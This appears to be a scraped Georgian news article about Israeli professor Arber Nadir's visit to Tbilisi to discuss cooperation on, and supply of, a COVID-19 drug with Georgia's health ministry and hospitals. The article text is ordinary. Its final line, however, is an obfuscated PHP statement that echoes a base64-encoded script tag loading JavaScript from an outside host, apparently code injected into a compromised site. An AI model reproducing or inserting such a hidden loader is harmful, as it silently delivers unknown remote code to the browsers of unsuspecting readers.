celsiusi
ავერსი საქკაბელი
საქართველოს შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრის მოწვევით, თბილისს კორონავირუსის სამკურნალო პრეპარატის შემქმნელი, ისრაელელი პროფესორი არბერ ნადირი სტუმრობდა. მან საქართველოს მთავრობის წარმომადგენლებთან საქმიანი შეხვედრები გამართა, მოინახულა რამდენიმე სამედიცინო დაწესებულება.
 
პროფესორი არბერ ნადირი ისრაელის სამედიცინო გიგანტის, მსოფლიოში წამყვანი სორასკის (იხილოვის) კლინიკის პროფესორია. კორონავირუსის საწინააღმდეგო პრეპარატის შექმნის შემდეგ, კლინიკა კიდევ უფრო მოექცა მსოფლიოს ყურადღების ცენტრში. სამედიცინო ცენტრმა თანამშრომლობის თაობაზე 10 ათასზე მეტი მიმართვა მიიღო. „ისრაელის სახლის“ ხელმძღვანელმა იციკ მოშემ კლინიკის ხელმძღვანელობასა და დონორებთან მოლაპარაკების შედეგად მიაღწია შეთანხმებას, რომ საქმიანი ურთიერთობები დაიწყოს საქართველოსთანაც, როგორც რეგიონში  ისრაელის მეგობარ ქვეყანასთან. 
 
„იმ დროს, როდესაც ტერორისტების რაკეტები თელ ავივის ბენ -გურიონის აეროპორტისკენ იყო მიმართული, შევძელით მსოფლიოში აღიარებული კლინიკის დონორებისა და წამყვანი მეცნიერის საქართველოში ჩამოყვანა. ვიზიტი იყო ერთდღიანი, მაგრამ ძალიან ნაყოფიერი“, - ამბობს იციკ მოშე.
 
კორონავირუსის საწინააღმდეგო პრეპარატის შემქმნელი შეხვდა თბილისის რესპუბლიკური საავადმყოფოს ხელმძღვანელობას, ინფექციური პათოლოგიის, შიდსის და კლინიკური იმუნოლოგიის ცენტრის ხელმძღვანელს, პროფესორ თენგიზ ცერცვაძეს. საუბარი შეეხო მომავალი თანამშრომლობის საკითხებს. არბერ ნადირი გაეცნო ვაქცინაციის პროცესს, დაათვალიერა სამედიცინო აპარატურა. მან ქართველ კოლეგებს გაუზიარა ახალი პრეპარატის მესამე ფაზის ექსპერტის შედეგები.
 
ისრაელელი პროფესორი და იხილოვის კლინიკის დონორი ორგანიზაციის ხელმძღვანელი მოშე კარასო მიიღო ჯანდაცვის მინისტრმა ეკატერინე ტიკარაძემ. შეხვედრას ესწრებოდნენ მინისტრის მოადგილე თამარ გაბუნია და „ისრაელის სახლის“ ხელმძღვანელი იციკ მოშე. მხარეებმა კლინიკასთან საქართველოს თანამშრომლობაზე და პრეპარატის წარმოების შემდეგ ქართული მხარისთვის გარანტირებული რაოდენობის მიწოდებაზე ისაუბრეს. აგრეთვე, ითქვა, რომ შესაძლოა, საქართველოში პრეპარატის წარმოებაც მოისინჯოს.
 
იციკ მოშეს თქმით, სახელმწიფოთა შორის მეგობრობის განმტკიცება მხოლოდ საქმითაა შესაძლებელი. ამ ვიზიტის ორგანიზება სწორედ ამას ემსახურება და იმედია, კიდევ უფრო წინ წაიწევს თანამშრომლობა მსოფლიოში წამყვან სამედიცინო ცენტრთან.
 
ჯანდაცვის მინისტრმა გამოთქვა სურვილი, რომ იხილოვის ცენტრმა ითანამშრომლოს თბილისის რესპუბლიკურ და ინფექციურ საავადმყოფოებთან, რათა ქართულმა მხარემ მომავალში შეძლოს პრეპარატის მიღება ისრაელიდან.
 
 
 
1951
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");